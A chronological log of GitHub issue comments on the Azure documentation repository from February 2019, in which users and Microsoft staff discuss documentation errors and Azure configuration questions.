[2019-02-21 00:22] Mike-Ubezzi-MSFT commented on #25268
@MarkWSolomon We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-21 00:31] Mike-Ubezzi-MSFT commented on #25300
@ncbrown1 What you see is the latest available code base. No updates have been made since November 18, 2018, and is what you should use with this tutorial.

[2019-02-21 00:31] imeya commented on #25160
@AmanGarg-MSFT, hello, how can I know the targetResourceId? is there any doc about that?

[2019-02-21 00:33] AlexanderTodorovic commented on #25332
@normesta I did it like this. Thank you.
![image](https://user-images.githubusercontent.com/7408389/53134736-ab439400-35bb-11e9-8e89-84f124ece8bd.png)

[2019-02-21 00:37] bhanu7755 opened #25403 "Azure Backup service doesn't considerate as 'Microsoft Services'"
I'm using Storage account to backup my code with Azure Backup service. After enabling "Selected networks" and even after enabling "Allow trusted Microsoft services to access this storage account" backup getting failed. It works only when setting the option to "All Networks" in "Firewall and virtual Network" configuration.

![image](https://user-images.githubusercontent.com/15000943/53134873-0c2798

[2019-02-21 00:44] adashen commented on #25352
@iAmoric , arm32v7 image could only be built by an arm32v7 host device for example a raspberry pi.

[2019-02-21 00:47] lovelangy opened #25404 "why must Docker be running?"
in this doc, it says Docker must be running before creating cluster.  Can you please explain why?

my Docker is not running (docker ps return error says "This error may also indicate
that the docker daemon is not running.")

however,  i can still create cluster and make the sample code running.

So i suspect docker is not required.

---
#### Document Details

⚠ *Do not edit this section. It is req

[2019-02-21 00:51] nmanzi commented on #21356
Would it be worthwhile updating this document to include that information?

[2019-02-21 00:51] mack0196 commented on #25201
Thanks for that lead. That will help us measure. I am also looking for a
way to get cosmos requests that have been processed already. I know I can
chart request counts on azure cosmos metrics view, but I cannot find
request details on the Azure cosmos view today.

Is there an api for getting past cosmos requests?

On Wed, Feb 20, 2019, 6:22 PM Mike Ubezzi <notifications@github.com> wrote:

[2019-02-21 00:53] AlexanderTodorovic commented on #25332
@normesta If I do it like this all works fine. So something in documentation is missing e.g. another `spark.conf.set(...)`. Thank you.

[code]

[2019-02-21 00:58] jeevansd commented on #25184
@mrmueller Yes the role claim value cannot be "null". If the value is null then Azure AD will not send that value in the token. This is by design.

[2019-02-21 00:59] jeevansd commented on #25184
@chetansriv and @v-viinde Can we add this special comment saying that if the role claim value is null then Azure AD will not send this value in the token and this is by design.

[2019-02-21 00:59] aspnet4you commented on #25229
@mattreatMSFT: I got it to work, finally!

I reinstalled the logstash plugin. It still did not work!
Then, I looked at the logstash-plain.log file and it's the logstash service that was Disable (by default). Installing the service does not enable it! I enabled it with systemctl enable logstash command and restarted the service. That worked for me. I can see the data coming from Azure Storage in Gr

[2019-02-21 01:01] MicahMcKittrick-MSFT commented on #25404
@lovelangy good point. It doesn't look like we actually utilize docker in this sample. In others where we do use docker, you obviously need it running to pull and push images. But I don't see anything like that in this doc. I am assuming the base for this doc was copied from another that did have that requirement :)

Adding content authors to review and update as needed.

@MikkelHegn @aljo-microso

[2019-02-21 01:01] Karishma-Tiwari-MSFT commented on #25385
@v-piwijs @mmccrory Can either of you help with the issue discussed here: https://developercommunity.visualstudio.com/content/problem/443790/the-os-family-6-you-are-trying-to-deploy-is-not-su.html
@jpconnock Can we update the doc with the note for OS Family 6 in the startup tasks. Thanks, :)

[2019-02-21 01:13] PramodValavala-MSFT commented on #25402
@Anand-Moghe Since APIM is deployed in VNETs owned by a user, one might expect that they can access the instance via its private IP. But that is not the case and the same is conveyed through that note.

The only way to access APIM is via its hostnames
- `<serviceName>.azure-api.net`
- `<serviceName>.portal.azure-api.net`
- `<serviceName>.management.azure-api.net`
- `<serviceName>.scm.azure-api.net

[2019-02-21 01:24] moab360 opened #25407 "Upgrade not an option in the Azure Portal"
I'm not sure if the portal has changed, but I'm unable to find the "Upgrade" option to move from v1 to v2 in the configuration section of my storage account.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 8bf5c2f8-d961-6460-194e-caa06ecfafa6
* Version Independent ID: 29c0ec30-d312-9e9f-0bff-8c5e6b7eb907
* Content: [Upg

[2019-02-21 01:35] bospoort opened #25408 "Include steps for portal"
There are two things here:
- you can do the same thing in 1 minute in the portal on the service bus. That should be mentioned and explained first before leading developers to spend an hour working on an ARM template
- •	The ARM template example shown at https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-service-endpoints?toc=%2fazure%2fvirtual-network%2ftoc.json#creating-a-vi

[2019-02-21 01:35] mrbullwinkle commented on #20334
This doc has now been updated here: [https://docs.microsoft.com/azure/azure-monitor/app/asp-net-trace-logs](https://docs.microsoft.com/en-us/azure/azure-monitor/app/asp-net-trace-logs)

We have also added a new doc on our new ILogger implementation for ASP.NET Core here: [https://docs.microsoft.com/azure/azure-monitor/app/ilogger](https://docs.microsoft.com/en-us/azure/azure-monitor/app/ilogger)

[2019-02-21 01:36] mrbullwinkle commented on #20334
@MicrosoftDocs/azure-cxp-triage  #please-close

[2019-02-21 01:36] mrbullwinkle commented on #17712
This doc has now been updated here: [https://docs.microsoft.com/azure/azure-monitor/app/asp-net-trace-logs](https://docs.microsoft.com/en-us/azure/azure-monitor/app/asp-net-trace-logs)

We have also added a new doc on our new ILogger implementation for ASP.NET Core here: [https://docs.microsoft.com/azure/azure-monitor/app/ilogger](https://docs.microsoft.com/en-us/azure/azure-monitor/app/ilogger)

[2019-02-21 01:37] mrbullwinkle commented on #17712
@MicrosoftDocs/azure-cxp-triage #please-close

[2019-02-21 01:41] #24568 closed

[2019-02-21 01:41] adanielov opened #25409 "missing performance specs for persistent data disks on Lsv2"
The Lsv2 specs show disk throughput specs for local NVMe disks only. But it is also important to know how many IOPS/ MBps we can get from persistent data disks - similar to how it is spec'ed for LS-series.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: af858f46-d98b-9240-47d8-74f98f1d9047
* Version Independent ID: e9d8

[2019-02-21 01:46] wilsonchua20 commented on #23489
I think this is for c#, is there one for java? i can't use the org apache httpclient as well because it always return unknown host, i think because of network/firewall settings in work..i am using the code i gave above since it worked for the microsoft speaker recognition api. thanks

[2019-02-21 01:48] alexdlevin opened #25410 "The instructions here work well but clicking on the tile does not work, only External URL"
Instructions seem pretty straight forward, but the only way I can get this to work is when I use the external URL in a browser, and per others advice, add '/RdWeb' to the end of the external URL.  If I log into the MyApps portal first and then click on the tile, the browser times out after about 30 seconds and then errors with : "Can't reach this page"  'Make sure the web address &lt;Home Page URL

[2019-02-21 01:49] BryanTrach-MSFT commented on #25390
@phil0007 Can you please provide us the URL of the doc that you are having issues with? We look forward to your reply.

[2019-02-21 01:53] Hanwen196 opened #25411 "Older version of blob emulator and explorer"
Hi, I was wondering where can I download the older of emulator and explorer.

I am looking for blob emulator 5.7 and blob explorer 1.2.0

There is only latest version available from the official website.

Can some one give me a help?

Many thanks.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 0bd49c9b-995f-cc7e-77d7-7

[2019-02-21 02:01] imeya commented on #25232
thanks @KrishnaG-MSFT. One more question, just after the alert created, the monitor will immediately start running automatically?

[2019-02-21 02:03] bcube commented on #25259
Thanks

[2019-02-21 02:03] bcube opened #25412 "Is this tutorial apply to Azure Active Directory B2C as well?"
As titled

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 823eb96f-e5f1-0832-b175-0b31009be92f
* Version Independent ID: 330085ae-dcf6-e930-86a8-0e4a60ab1314
* Content: [Protect an API by using OAuth 2.0 with Azure Active Directory and API Management](https://docs.microsoft.com/en-us/azure/api-management/api-management-

[2019-02-21 02:08] Mike-Ubezzi-MSFT commented on #25201
@mack0196 Are you looking for the entire document Json for the events that are currently visible to you in the metrics view? By `request details`, are you looking for the entire message or additional telemetry data about those past requests?
Cosmos DB does have a REST API for accomplishing a wide range of operational tasks: [Common tasks using the Azure Cosmos DB REST API](https://docs.microsoft.c

[2019-02-21 02:14] mganeshphani commented on #15889
@MohitGargMSFT  this issue is closed wrongly.... please provide justification on how this can be achieved

[2019-02-21 02:15] BryanTrach-MSFT commented on #25214
@tplas Please let us know if Van's reply helps to answer your question. We look forward to your reply.

[2019-02-21 02:17] BryanTrach-MSFT commented on #25403
@bhanu7755 Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:19] BryanTrach-MSFT commented on #25392
@joshtransient Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:19] imeya commented on #25232
and @KrishnaG-MSFT , for the 2nd question, just want to make it clear. let's say the threshold is 70. and in the 1rst minute the number is 50, and in the 2nd minute the number is 60 , so it will send an alert, right?

[2019-02-21 02:25] BryanTrach-MSFT commented on #25394
@ghuntley We are sorry to hear that this happened to you. Please note that we constantly strive to improve the experience within Azure. I have assigned your issue to Femi who will assist you further.

[2019-02-21 02:28] BharathNimmala-MSFT commented on #17712
Thank you Michael

[2019-02-21 02:28] #17712 closed

[2019-02-21 02:36] BryanTrach-MSFT commented on #25401
@reggaeguitar Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:37] BryanTrach-MSFT commented on #25398
@mganeshphani Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:38] BryanTrach-MSFT commented on #25397
@rupeshprasad Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:41] BryanTrach-MSFT commented on #25386
@sirjameswood Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:42] v-piwijs commented on #25385
I have commented with instructions on how to install the Azure SDK in the dev community site.

This page https://docs.microsoft.com/en-us/azure/cloud-services/cloud-services-guestos-update-matrix will be updated with these instructions as well at the next build (2/21 morning)

[2019-02-21 02:42] BryanTrach-MSFT commented on #25383
@sirjameswood Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:43] BryanTrach-MSFT commented on #25380
@sirjameswood Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:45] BryanTrach-MSFT commented on #25411
@Hanwen196 Can you please provide us with the URL of the doc that you are having issues with?

[2019-02-21 02:46] BharathNimmala-MSFT commented on #20334
Thank you Michael.

[2019-02-21 02:46] #20334 closed

[2019-02-21 02:47] YASWANTHM-MSFT commented on #25407
@moab360 , Please follow below steps to upgrade from general-purpose v1 storage account to general-purpose v2.
1)Locate and Navigate to your storage account
2)On the left side tile under the Settings section,  click Configuration.
3)Under Account kind, click on Upgrade.
4)Under Confirm upgrade, type in the name of your account.
5)Click Upgrade at the bottom of the blade as shown below.

![image](h

[2019-02-21 02:54] BryanTrach-MSFT commented on #25412
@bcube Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:55] BryanTrach-MSFT commented on #25408
@bospoort Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:55] BryanTrach-MSFT commented on #25409
@adanielov Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 02:57] BryanTrach-MSFT commented on #25410
@alexdlevin Thanks for the feedback! I have assigned the issue to the content author to investigate further and update the document as appropriate.

[2019-02-21 03:24] ManojReddy-MSFT commented on #25297
@vikher If you are using MSAL or ADAL libraries, you do not need to write your own code to obtain fresh access token.

You can check the sample available [here ](https://azure.microsoft.com/en-us/resources/samples/active-directory-b2c-xamarin-native/)for reference.

[2019-02-21 03:28] ManojReddy-MSFT commented on #25026
@mcurko I am not able to reproduce the issue at my end. I tried this with multiple subscriptions and different accounts. There are no known bugs with the module as well.

At this point, I recommend creating a support ticket with Microsoft to investigate this further. Do let me know if you have a support plan that enables you to create support tickets. If you do not have a support plan, then please

[2019-02-21 03:31] Hanwen196 commented on #25411
@BryanFranzMSFT
https://docs.microsoft.com/en-us/azure/storage/common/storage-use-emulator
here is the doc. I have no problem in reading and operating this doc. We are setting up our dev env on the developer machines.

The existing component is blob storage emulator 5.7 and explorer 1.2.0.

However, we could not find the link to download the old version.

Can you please point out where can I downl

[2019-02-21 03:39] PramodValavala-MSFT commented on #25259
@bcube Glad we could help!

We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 03:39] #25259 closed

[2019-02-21 03:44] fgbaezp commented on #25005
I'm still seeing the "Console App (.Net Framework)" instead of the "Console App (.Net Core)". Or at least the clarification on the document that you can choose one of the two options :).

[2019-02-21 03:48] iizotov opened #25415 "Document max log and tempdb sizes for the DTU-based model"
Max log size and max tempdb size are documented for the vCore-based model, please document these limits for the DTU-based model as well

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 94c33577-a694-bd91-d0fa-791ff3cbee13
* Version Independent ID: 449ad3ed-7959-aca2-07aa-e4e43d333ec7
* Content: [Azure SQL Database DTU-ba

[2019-02-21 03:49] iizotov opened #25416 "Document max log and tempdb sizes for the DTU-based model"
Max log size and max tempdb size are documented for the vCore-based model, please document these limits for the DTU-based model as well

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 83ac6bf5-b77e-2eeb-20ad-f850fbbf06c6
* Version Independent ID: fa64f1b9-62f1-3abc-523c-419682d911c0
* Content: [Azure SQL Database DTU-ba

[2019-02-21 03:56] DixitArora-MSFT commented on #25355
@Robar666  Work for custom domain in consumption tier is still in progress. It should be available in couple of months.

[2019-02-21 04:02] PramodValavala-MSFT commented on #25278
@rabrahamOpti You can parameterize the path of an operation as mentioned in [this section](https://docs.microsoft.com/en-us/azure/api-management/add-api-manually#add-and-test-a-parameterized-operation) of the doc.

By default, the same URI path is appended as is to your backend service URL.

You can override this behavior with these policies -
- To override the backend service URL, use the [`set-b

[2019-02-21 04:06] ggailey777 commented on #25005
Sorry for the confusion, but the updates haven’t gone live yet.

[2019-02-21 04:13] htate1234 commented on #13022
The body of the email is not customizable as shown above from what I have been researching and testing for 48 hours. From what I see, company branding only adds the logo to the top of the email.

In your renders above, you were able to customize the text beneath the 'Get Started' button. In the first render, it shows "Questions? Contact John Doe at...." - however, I cannot find anywhere that this

[2019-02-21 04:15] rizwaans opened #25418 "Check for null in Array Logicapp"
Hi,

I have a json array
**{
  "data": []
}**

how can I check for null/empty for 'data' parameter in the above  ?

Currently, I have this below line of code

"expression": {
                            "and": [
                                {
                                    "equals": [
                                        "@{items('For_each_3')['data']}",

[2019-02-21 04:18] htate1234 opened #25419 "Cannot Customize invite email as shown"
In reference to: https://docs.microsoft.com/en-us/azure/active-directory/b2b/invitation-email-elements

The body of the email is not customizable as shown from what I have been researching and testing for 48 hours. From what I see, company branding only adds the logo to the top of the email.

In your renders on the page, you were able to customize the text beneath the 'Get Started' button. In the

[2019-02-21 04:20] angoyal-msft commented on #25416
Closing this thread. As this is duplicate of below thread:
https://github.com/MicrosoftDocs/azure-docs/issues/25415

[2019-02-21 04:20] #25416 closed

[2019-02-21 04:23] CHEEKATLAPRADEEP-MSFT commented on #25375
@DaveEM Thanks for pointing out the issue, I've addressed this issue in below PR: [https://github.com/MicrosoftDocs/azure-docs-pr/pull/67106](https://github.com/MicrosoftDocs/azure-docs-pr/pull/67106)

The changes should be live EOD or tomorrow. We will now close this issue. In future, if you see any minor bug fixes in the doc, feel free to click on the edit button and submit a PR to update. we lo

[2019-02-21 04:23] #25375 closed

[2019-02-21 04:25] amolmore3171 commented on #24851
Thanks Mike for your reply. However, issue has been resolved now. By creating, a library in your Databricks workspace using the Maven coordinates com.microsoft.azure:azure-eventhubs-spark_2.11:2.3.2 or higher version.
Here is link,
https://stackoverflow.com/questions/54693437/stream-data-into-azure-databricks-using-event-hubs

[2019-02-21 04:25] angoyal-msft commented on #25415
@iizotov Thanks for the valuable feedback. I have assigned this issue to the content author to help you further.
@CarlRabeler could you please help here in enhancing the document.

[2019-02-21 04:41] angoyal-msft commented on #25007
@bryanklewis I have assigned this issue to @JasonWHowell to help you further.

[2019-02-21 04:47] SumanthMarigowda-MSFT commented on #20989
@colinrippeyfinarne Required necessary changes has been performed.
We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 04:47] #20989 closed

[2019-02-21 04:50] ManojReddy-MSFT commented on #25401
@reggaeguitar Thanks for reporting this. You can use the following steps:
1) Select your account in the upper right corner.
2) Select the three dots (more links) in the popup.
3) Select My permissions

I have assigned this to the author to update the doc with the UI change.

[2019-02-21 04:52] DashleenBhandari-MSFT commented on #25240
@abhishek-kumar-mishra We are working internally on this issue. I will keep you updated.

[2019-02-21 04:54] SumanthMarigowda-MSFT commented on #25143
@SychevIgor We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 04:54] #25143 closed

[2019-02-21 04:58] CHEEKATLAPRADEEP-MSFT commented on #25273
@chantong47 We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-21 04:58] #25273 closed

[2019-02-21 05:11] ManojReddy-MSFT commented on #25397
@rupeshprasad Thanks for reporting this. I have updated the doc and it will published shortly.

[2019-02-21 05:12] CHEEKATLAPRADEEP-MSFT commented on #25357
@bertrandpons **Note:** Azure-SSIS integration run time supports only Azure Resource Manager virtual networks for your Azure-SSIS IR to join if you use Azure SQL Database server with virtual network service endpoints or require access to on-premises data stores.

The Data Factory service connects to your Azure SQL Database to prepare the SSIS Catalog database (SSISDB). It also configures permissio

[2019-02-21 05:26] CHEEKATLAPRADEEP-MSFT commented on #25306
@chall-bhs Could you ask your question in the forums? The audience there would be a better suited to answer your support question. Please provide as much detail as possible about your scenario:
[Azure Data Factory Forum](https://social.msdn.microsoft.com/forums/azure/en-US/home?forum=AzureDataFactory).

[2019-02-21 05:31] CHEEKATLAPRADEEP-MSFT commented on #25298
@ThirstyAdmin **Note:** Blob storage APIs aren't yet available to Azure Data Lake Storage Gen2 accounts.

These APIs are disabled to prevent inadvertent data access issues that could arise because Blob Storage APIs aren't yet interoperable with Azure Data Lake Gen2 APIs.

For more details, refer “[Azure Data Lake Gen2: Blob storage APIs](https://docs.microsoft.com/en-us/azure/storage/blobs/data-la

[2019-02-21 05:35] lovelangy commented on #24275
i run in to the same problem.
**Reason**:  no permssion to create certificate in key vault.
**Solution**:
1.  Login to Azure portal -> KeyVaults -> your keyVault -> Access Policies -> Add New
2.  Add the Azure account which you run New-AzureRmServiceFabricCluster
3.  Grant 'Create' and 'List' Certificate Permission

Then re-run  New-AzureRmServiceFabricCluster, it will succeed.

[2019-02-21 05:35] jayendranarumugam commented on #25345
Hi @RohitMungi-MSFT , I'm using DotNetFramework version **4.6.1**. Let me know if you need any information further

[2019-02-21 05:40] #25397 closed

[2019-02-21 05:49] AmanGarg-MSFT commented on #25160
@imeya You can go to the resource explorer on the Azure Portal.

Click on "All services" and search for "Resource Explorer"

![image](https://user-images.githubusercontent.com/44466503/53146477-50656900-35ca-11e9-8c2f-2ea997dc712a.png)

Find your resource under your subscription and there you would be able to find the targetResourceId.

[2019-02-21 05:51] v-maroge commented on #24998
@cynthn No, our customer just wanted a general expectation. Thanks.

@axayjo Got it. Thanks

[2019-02-21 06:02] shashishailaj commented on #23421
@kogesaka  We are still getting this reviewed and assessing the impact of any changes that we make on this .

++ @BarbaraSelden

[2019-02-21 06:06] dinu99 opened #25424 "Gateway IP is missing when DNS settings are updated in VM"
Editing DNS settings directly within windows removes the gateway IP and results in VM RDP disconnection via public IP. Ideally it should not erase IP settings until below stated scenario of this document.
Note: Network connection properties, such as DNS server IPs, should not be edited directly within Windows VMs. This is because they might get erased during service heal when the virtual network a

[2019-02-21 06:09] YASWANTHM-MSFT commented on #25403
@bhanu7755 , Did you register the required resource providers name “Microsoft.SiteRecovery/ Microsoft.Networking” in your subscription level?
If not, you can run the below PowerShell command to register the resource provider “Microsoft.Backup” and check if still the backup jobs are failing
`Login-Azaccount
Select-azsubscription -Subscriptionname “your subscription name”
Register-AzResourceProvider

[2019-02-21 06:16] rollandjb opened #25426 "Out of date Release Notes"
Today, 02/21/2019, The Release Notes for Identity Experience Framework is dated 10/13/2017. Where are the latest Release Notes?

I am particularly interested in the use of client_assertion to pass pre-population values for a user journey, but this is marked here as "will be deprecated", yet is still available today.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.m

[2019-02-21 06:17] thala321 opened #25427 "Bad token from PHP SAS generator"
The current link for PHP SAS generator currently return bad token. When used, it gave "40103: Invalid authorization token signature". After trying with Powershell generator, everything is working just fine.
https://docs.microsoft.com/en-us/rest/api/eventhub/generate-sas-token

[2019-02-21 06:29] SubhashVasarapu-MSFT commented on #25229
@aspnet4you Thanks for sharing the solution with the community. We have assigned the issue to content author to update the document accordingly.

[2019-02-21 06:30] krishna0815 commented on #24861
Multi-tenant access is not supproted. The Service principal created for a given Stream Analytics job will reside on the Azure Active Directory tenant on which the job was created, and cannot be used against a resource that resides on a different Azure Active Directory tenant. Therefore, you can only use MSI on ADLS Gen 1 resources that are within the same Azure Active Directory tenant as your Azur

[2019-02-21 06:35] mcurko commented on #25026
I don't need a support ticket, my comment was intended to provide info to you, I can manage around the issue.

Regards,
Marko Čurko

Marko Čurko
Senior Developer │ Perpetuum Mobile d.o.o.
Damira Tomljanovića Gavrana 13, 10000 Zagreb
m +385 91 2305 123 │ t +385 1 6390 834
marko.curko@perpetuum.eu<mailto:marko.curko@perpetuum.eu> │ www.perpetuum.hr<http://www.perpetuum.hr/>

[cid:image002.png@01D342

[2019-02-21 06:36] ManojReddy-MSFT commented on #25426
@rollandjb Thanks for the feedback. I have assigned this to the author to provide an update regarding this and update the doc with any new changes.

[2019-02-21 06:40] vikramdadwal commented on #25285
I was able to enable https binding **_within the container with certificate_**. I was able to host the same in SFMesh as shown below the app is running fine:

![image](https://user-images.githubusercontent.com/10174566/53148607-1d868b00-3560-11e9-838e-b67f27d1889b.png)

Now I need information regarding how to access it using public IP (using gateway or any other option). Please suggest.

Thanks.

[2019-02-21 06:41] kazshi opened #25428 "possible to send email directly to external domains using TCP port 587?"
I understand that recommendation is to use authenticated SMTP relay services to send email from Azure VMs or Azure App Services, but is it possible to send outbound email messages directly to external domains using TCP port 587?  Thanks.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 027fa865-2329-23de-3740-cfbe3535930

[2019-02-21 06:44] zer0big commented on #24193
@zr-msft Is this fixed now? When do you exepct to be completed? It is still the same to me. When connecting to Jenkins VM I created, verify the status  of jenkins service. The result of the issuing command like following

azureuser@myVM:~$ service jenkins status
● jenkins.service - LSB: Start Jenkins at boot time
   Loaded: loaded (/etc/init.d/jenkins; generated)
   Active: failed (Result: exit-co

[2019-02-21 06:53] KrishnaG-MSFT commented on #25232
@imeya To answer the 2nd question, whether it sends out an alert or not is dependent on the numbers for 3rd, 4th and 5th minutes.

The answer is No if we assume the numbers something like 65, 67, 69 in 3rd, 4th and 5th minutes. Then in this case the monitor does an average of all the numbers for the last 5 minutes i.e., (50+60+65+67+69)/5 and as the average value is 62.2 which is less than the thr

[2019-02-21 06:54] KrishnaG-MSFT commented on #25330
@imeya Closing this issue for now. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-21 06:54] #25330 closed

[2019-02-21 06:57] KrishnaG-MSFT commented on #25170
@pdhimate Closing this issue for now. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-21 06:57] #25170 closed

[2019-02-21 06:58] KrishnaG-MSFT commented on #25168
@nelisbijl Closing this issue for now. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-21 06:58] #25168 closed

[2019-02-21 07:05] jakaruna-MSFT commented on #24998
@v-maroge I will close this out for now. If you need additional help please let me know and we can reopen and continue.

[2019-02-21 07:05] #24998 closed

[2019-02-21 07:06] jakaruna-MSFT commented on #24910
@rahulchoudhary242  I will close this out for now. If you need additional help please let me know and we can reopen and continue.

[2019-02-21 07:06] #24910 closed

[2019-02-21 07:15] SadiqhAhmed-MSFT commented on #25328
@maverick126 Scoping a budget to a tag is supported for EA subscriptions. [Reference](https://azure.microsoft.com/en-in/blog/announcing-the-support-for-tags-in-cost-management-apis/)

[2019-02-21 07:18] rayne-wiselman commented on #10615
This content has been rewritten at https://docs.microsoft.com/en-us/azure/backup/backup-overview . Hopefully it's now clearer.

Thanks!
#please-close

[2019-02-21 07:19] yuwzho opened #25430 "Java sample is out of date"
The URL in the link and code snippet are incorrect

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 0c92aece-d680-ddf0-f51b-26086ce77da8
* Version Independent ID: fd14c199-3441-d790-ba70-80c2c716c620
* Content: [Quickstart - Use the Azure CLI to create a Service Bus queue](https://docs.microsoft.com/en-us/azure/service-b

[2019-02-21 07:19] rayne-wiselman commented on #12387
I added the info about internet access reqs into https://docs.microsoft.com/en-us/azure/backup/backup-architecture#architecture-direct-backup-of-azure-vms as well.
Hopefully this is now covered.
Thanks!
#please-close

[2019-02-21 07:21] dcbrown16 commented on #10615
Thanks @rayne-wiselman. I can close, but what I think would be clearest is if "Back up entire VM" said something like "Back up entire VM (including files, folders, and system state)". I'll leave it up to you.

[2019-02-21 07:21] #10615 closed

[2019-02-21 07:25] rayne-wiselman commented on #14211
Thanks!
Removed #please-close

[2019-02-21 07:26] iAmoric commented on #25352
@adashen there is no possibility to "cross-build" using visual studio code ?

[2019-02-21 07:29] ChiragMishra-MSFT commented on #25018
@imeya Sorry for the delayed response. One scenario is sending events to an event hub using its connection string. To read more about it, please refer [this doc](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-programming-guide).

[2019-02-21 07:30] jakaruna-MSFT commented on #25165
is there any update?

[2019-02-21 07:32] kazshi commented on #21957
@rayne-wiselman Thank you for the update.

[2019-02-21 07:32] #21957 closed

[2019-02-21 07:33] lightupdifire commented on #25185
@MarileeTurscak-MSFT,
Thanks, I know how Dynamic groups works, we do query already different groups with condition as:
Device = Corporate -and Device managed = MDM -and Account enabled = true; etc.
Question is how to use Dynamic group for condition "isCompliant",
The "isCompliant" not exist in Dynamic group documentation and not available in options while creating group, just wanted to check if th

[2019-02-21 07:34] adashen commented on #25352
@iAmoric you could leverage the docker -H configuration to connect from vscode to an raspberry pi to do the remote work. Please refer to blog https://devblogs.microsoft.com/iotdev/easily-build-and-debug-iot-edge-modules-on-your-remote-device-with-azure-iot-edge-for-vs-code-1-9-0/ for reference

[2019-02-21 07:37] rayne-wiselman commented on #15518
@mizhaky Hi, I've rearranged this article https://docs.microsoft.com/en-us/azure/backup/backup-azure-sql-database so hopefully it's clearer now. I would be happy to get your feedback as to whether it's now more understandable. Thanks!

I'm marking to close. If you think it needs more work let me know. thx

#please-close

[2019-02-21 07:41] iAmoric commented on #25352
Thanks I will follow that

[2019-02-21 07:49] rayne-wiselman commented on #16159
Thanks for your feedback!
This is now fixed
#please-close

[2019-02-21 07:56] bertrandpons commented on #25357
@CHEEKATLAPRADEEP-MSFT Thank you for your reply. I don't want to use virtual network, only Azure SQL Database without virtual network service endpoints.

My question is more to know if there is a pool of ip addresses from my ADF Azure-SSIS IR to allow in Azure SQL Server firewall rules to make ADF and the SQL server communicate, instead of let turned on the rule "Allow access to Azure services"

[2019-02-21 07:57] bramvdklinkenberg commented on #24839
@iainfoulds
Will it, in the future, also be possible to enable calico for existing aks cluster? at this point it is only available for new aks clusters.

[2019-02-21 07:59] Aashikms opened #25433 "Connect Azure IOT edge device to IOT hub and IOT central"
Hi,

I have an edge device which is connected to Azure IOT hub and sends telemetry data to it. Now i want that data to be reflected in IOT central also. Is there a way to send telemetry data from edge module and that data will be reflected in both hub and central.

Thanks,

[2019-02-21 08:11] CastleArg opened #25434 "ensure bindings are installed"
when deploying node functions with azure devops how can we make sure bindings are installed?
I just get Function (my function) Error: The binding type(s) 'blobTrigger' are not registered. Please ensure the type is correct and the binding extension is installed.
when I veiw in the portal

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue li

[2019-02-21 08:26] hisasima opened #25435 "Two VMs use same VM name on a virtual network."
If two VMs use same VM name on a virtual network, we can not resolve each VMs name by DNS. But we can deploy two VMs which use same VM name and belong to other resource group. I think this limitation should be written in this document. E.g. "Must not two VMs use same VM name on a virtual network because we can not resolve each VMs name by DNS"

---
#### Document Details

⚠ *Do not edit this sectio

[2019-02-21 08:36] poelstra commented on #25049
@BharathNimmala-MSFT What quota limit are you specifically referring to?

AKS is available for my region, and it's the first cluster I'm creating.
I'm not aware of having reached any other quota limit (I've only created a few small test things).

[2019-02-21 08:44] berhauz commented on #24356
Dear Mike,

Thank you for your attention to the issue. Actually, I do not need any support. I unveiled the issue and use now my own java source code to sucessfully post events to the peers with whom I interconnect in Azure. Indeed, you can close the ticket relating to documentation, but you would be well advised to escalate the problem to the development team, as there is a flaw (a security flaw a

[2019-02-21 08:45] wesleyniels commented on #25052
You can use powershell to set an ip rule and automate it:
https://about-azure.com/2018/11/26/configure-azure-app-service-ip-restrictions-using-powershell/

[2019-02-21 08:51] anonymouse64 opened #25436 "Images and explanation are out of date"
Explanation of how to create new web app is out-of-date. For example this image:

![alt text](https://docs.microsoft.com/en-us/azure/iot-hub/media/iot-hub-live-data-visualization-in-web-apps/5_configure-web-app-deployment-local-git-repository-azure.png)

shows the no longer existing "Deployment Options" which is missing in my recent version in the portal:

![ms-missing-deploy-options-button](https

[2019-02-21 08:54] tjvishnu commented on #16758
@dcbrown16 I believe you are referring to ASR, while this thread refers to backing up Azure Files using Azure backup. There is no limitation as mentioned in this thread.

#please-close this thread.

[2019-02-21 09:03] phatcher commented on #25371
@MarileeTurscak-MSFT But your documentation implies that it is, at least caveat that...

